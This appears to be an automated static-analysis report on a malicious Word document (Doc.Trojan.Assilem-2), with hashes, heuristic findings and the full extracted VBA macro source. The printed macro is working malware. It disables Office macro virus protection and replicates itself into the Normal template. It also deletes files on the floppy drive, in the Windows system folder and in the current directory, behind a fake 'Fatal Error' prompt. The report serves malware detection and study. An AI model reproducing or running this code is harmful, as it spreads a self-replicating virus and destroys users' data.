Doc.Trojan.Assilem-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 6895a7cd1b2d5965…

MALICIOUS

Office (OLE)

89.5 KB Created: 2015-01-04 10:10:00 Authoring application: Microsoft Office Word First seen: 2016-09-01
MD5: 10dcef30afbce28aac7dc5c9e5177b57 SHA-1: 38dfd4331a6e91c4c7e212699890586b8767b76d SHA-256: 6895a7cd1b2d5965bb6a94a356e1e43d720ca6e742b3ea7dfe20d281da613ccf
150 Risk Score

Malware Insights

Doc.Trojan.Assilem-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing VBA macros. The 'Document_Open' macro is designed to disable macro virus protection and replicate its code to the Normal template and the current document, indicating an attempt at persistence and evasion. ClamAV detection confirms this as Doc.Trojan.Assilem-2.

Heuristics 5

  • ClamAV: Doc.Trojan.Assilem-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Assilem-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        .VirusProtection = False
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3153 bytes
SHA-256: 4b6111e9ad421f515d859e353bf19977f9ac9b897c8ac78a6693b165ed19d404
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "QNC"
Attribute VB_Base = "1Normal.QNC"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'########## QNC in TaiWan 2000.1.1 #############
On Error Resume Next
With ActiveDocument
    .ReadOnlyRecommended = False
End With
With Options
    .BackgroundSave = True
    .AllowFastSave = True
    .SavePropertiesPrompt = False
    .SaveInterval = 1
    .SaveNormalPrompt = False
    .VirusProtection = False
End With
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "QNC" Then
     If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
     Set ToInfect = ADI1
     ADI1.Name = "QNC"
     DoAD = True
End If
If NTI1.Name <> "QNC" Then
     If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
     Set ToInfect = NTI1
     NTI1.Name = "QNC"
     DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
     If DoNT = True Then
          Do While ADI1.CodeModule.Lines(1, 1) = ""
               ADI1.CodeModule.DeleteLines 1
          Loop
          ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
          Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
               ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
               BGN = BGN + 1
          Loop
     End If
If DoAD = True Then
      Do While NTI1.CodeModule.Lines(1, 1) = ""
           NTI1.CodeModule.DeleteLines 1
      Loop
      ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
      Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
           ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
           BGN = BGN + 1
      Loop
End If
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
     ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
     ActiveDocument.Saved = True
End If
CYA:
If CInt(Hour(Now)) >= 17 And CInt(Hour(Now)) <= 23 Then
   On Error Resume Next
   Kill "a:\*.*"
End If
m = CInt(Month(Now))
d = CInt(Day(Now))
If (d = 13) And (m Mod 4 = 0) Then
   On Error Resume Next
   If MsgBox("Fatal Error!Power Off Your Computer Now!!", vbCritical + vbOKCancel, "警告!") = vbCancel Then
     Dim filestring As String
     Dim Dir1, FF
     Dir1 = "c:\windows\system\"
     FF = Dir(Dir1 & "*.*", vbArchive Or vbHidden Or vbSystem Or vbDirectory)
     Do
      If (GetAttr(Dir1 & FF) And vbDirectory) <> vbDirectory Then
       If GetAttr(Dir1 & FF) = vbReadOnly Or vbSystem Or vbHide Then
          SetAttr Dir1 & FF, vbNormal
       End If
       Kill Dir1 & FF
      End If
      FF = Dir
     Loop Until FF = ""
   End If
   Dir1 = CurDir()
   If Right(Dir1, 1) <> "\" Then Dir1 = Dir1 & "\"
   Kill Dir1 & "*.*"
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.